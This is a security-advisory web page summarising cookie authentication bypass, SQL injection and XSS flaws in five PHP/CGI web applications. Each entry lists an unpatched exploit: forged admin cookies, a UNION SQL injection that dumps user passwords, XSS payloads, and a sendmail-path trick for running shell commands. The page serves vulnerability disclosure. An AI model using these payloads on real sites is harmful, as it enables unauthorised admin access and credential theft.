Recent Cookie Authentication Bypass vulnerabilities
Here is short summary of recent Cookie Authentication Bypass vulnerabilities discovered by eVuln team. Full list with details is available on the eVuln Security Advisories page.
Cookie authentication bypass in Alguest.
Description.
Cookie-based authentication lack is present in admin.php, opzioni.php, elimina.php, modifica.php scripts. Administration functions are threatened
Exploit.
There is no real password comparison for admin user. Administration scripts check only existence of admin cookie.
Cookie: admin=anyvalue
Solution
Solution is not available.
Other details >>Cookie Auth Bypass in Hot Links SQL.
Description.
cookie Auth Bypass vulnerability found in Hot Links SQL 3. It is possible to get access to admin panel without password comparison.
Exploit.
There is no password comparison during authentication process. Actually script checks only admin cookie. If it's value is logged in user is authenticated as Admin.
Cookie: admin=logged in
Solution
Solution is not available.
Other details >>Multiple Vulnerabilities in VSNS Lemon.
Description.
Vulnerable script: functions/final_functions.php
Variable $id is not properly sanitized before being used in SQL query. This can be used to bypass authentication or make any SQL query by injecting arbitrary SQL code.
Condition: magic_quotes_gpc = off
Adding comment form. Parameter 'name' is not properly sanitized. This can be used to post arbitrary HTML or JavaScript code.
There is a possibility to bypass authentication for pasword-protected articles. Password-checking function dont make password comparisson, just check cookie value for existance.
Exploit.
- <form method="post" action="http://[host]/vsns/index.php">
- <input type="hidden" name="towel" value="checkpass">
- <input name="id" value="9999' union select 123,4,5,6/*">
- <input type="password" name="password" value="123">
- <input type="submit" value="Go">
- </form>
Add Comment.
Example URL: http://[host]/vsns/index.php?towel=archive&type=id&id=1#vsns_comments_display
Name: [XSS]
Read any password-protected topic:
Cookie: vsns[topic_id] = 1
Solution
Solution is not available.
Other details >>Multiple flaws in Leif M. Wright Blog.
Description.
All "txt" files isn't protected by htaccess(or any other ways) in default installiation. This can be used to retrieve administrator's password from config file.
"blog.cgi" script dont make password comparisson when identifying administrator by cookie.
Administrator has an ability to edit blog configuration including full path to sendmail program. This can be used to execute arbitrary shell commands.
System access is possible.
Environment variables HTTP_REFERER and HTTP_USER_AGENT are not properly sanitized. This can be used to post HTTP query with fake Referer or User-Agent values which may contain arbitrary html or script code. This code will be executed when administrator will open "Log" page.
Exploit.
Url example:
http://[host]/cgi-bin/blog/blogconfig.txt
Cookie: blogAdmin=true
Sendmail: /bin/ls
GET /cgi-bin/blog/blog.cgi HTTP/1.0
Host: [host]
Referer: [XSS]
User-Agent: [XSS]
Content-Type: application/x-www-form-urlencoded
Content-Length: 93
file=15-13.59.39.txt&year=2006&month=February&name=zz&comment=zzz&submit=Enter%20my%20comment
Solution
Solution is not available.
Other details >>Cookie Auth Bypass, SQL Injections, XSS in 427BB.
Description.
427BB has multiple vulnerabilities.
Vulnerabe scripts: login.php getvars.php
To authorize any logged-in user forum scripts checks only three cookie values:
- username
- authenticated
- usertype
Forum dont make password comparison.
For example:
Vulnerabe script: showthread.php
Variable $ForumID isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code
Vulnerable Script: posts.php
Condition: visitor needs to click this link
Exploit.
No password needed:
Cookie: username=admin;Cookie: authenticated=1;Cookie: usertype=admin;
Need to be logged in as registered user.
http://host/bb427/showthread.php? ForumID=999%20union%20select%20UserName,Passwrod,null,null%20from%20prefPersonal
Posting new message. Message text:
[url=javascript:alert(xss)]clickme[/url]
Solution
Solution is not available.
Other details >>